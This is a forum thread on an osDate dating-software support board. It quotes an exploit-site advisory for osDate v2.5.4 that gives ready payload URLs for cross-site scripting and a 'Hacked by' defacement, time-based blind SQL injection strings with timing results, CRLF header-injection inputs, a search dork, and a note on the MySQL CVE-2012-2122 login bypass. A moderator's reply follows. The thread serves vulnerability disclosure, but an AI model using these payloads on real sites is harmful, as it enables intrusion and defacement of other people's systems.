0 Members and 1 Guest are viewing this topic.

*

staan

  • *
  • 35
  • Stan, 29 Yo - France
  • osDate Version: osDateEvo v1.3
[SECURITY BREACH] maybe some test
« on: March 26, 2019, 02:06:09 AM »
http://www.exploit4arab.org/exploits/1142

Quote
osDate v254 Multi Vulnerability

=================================

Author :  indoushka

Vondor :  http://www.tufat.com/osdate.php

Dork   :  Powered by osDate ©2014

======================================



Cross site scripting (verified) :



http://127.0.0.1//public_html/index.php?page=allnews&pageno=2%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28980103%29%3C/ScRiPt%3E



Affected items

/public_html/afflogin.php

/public_html/feedback.php

/public_html/index.php

/public_html/midlogin.php

/public_html/plugins/luckySpinGender/libs/spinAgain.php

/public_html/searchmatch.php

/public_html/sendinvite.php

/public_html/supreq.php

/public_html/userpicgallery.php



Security vulnerability in MySQL/MariaDB sql/password.c :



Vulnerability description:



Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers.

When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value.

Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value.

In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts.

~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent.



Affected versions:



All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

Affected items

/public_html/admin/phpinfo.php



The impact of this vulnerability :



An attacker can bypass MySQL authentication.



How to fix this vulnerability :



Upgrade to the latest version of MySQL.



( XSS / HTML Inject ) :



http://127.0.0.1/public_html/afflogin.php?errormsg=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E



Blind SQL Injection :



URL encoded POST input txtlookagestart was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/



Tests performed:

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 3.931 s

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 9.969 s

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.967 s

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.942 s

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.92 s

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.045 s

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.03 s

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 7.02 s

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.029 s

http://127.0.0.1/public_html/searchmatch.php?lookcountry=AA&srchzip=&txtgender=M&txtlookageend=90&txtlookagestart=16&txtlookgender=M&with_photo=1



CRLF injection/HTTP response splitting :



Affected items

/public_html/midlogin.php

/public_html/userpicgallery.php



URL encoded GET input id was set to SomeCustomInjectedHeader:injected_by_trtr

URL encoded GET input type was set to SomeCustomInjectedHeader:injected_by_trtr

127.0.0.1/public_html/userpicgallery.php?id=88&type=%0d%0a%20<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>



I checked and some XSS security breach are always here in OsdateEvo.

*

Pharg

  • *****
  • 3,272
    • OsDateFourm
  • osDate Version: osDateEvo v1.3
Re: [SECURITY BREACH] maybe some test
« Reply #1 on: March 26, 2019, 05:54:42 AM »
Hi Stann,

That's for the old osDate v2.5.4 which is no longer used.

What are the issue in osDateEvo v1.3 if any?
Regards,
Pharg ( Phill )

Don't Personal Message me unless it's about a sensitive matter!!

REMEMBER TO ALWAYS BACKUP BEFORE MAKING ANY CHANGES!!

osDateEvo v1.3 | PHP: 5.3.42 & PHP: 7.2 | MySQL: 5.5.35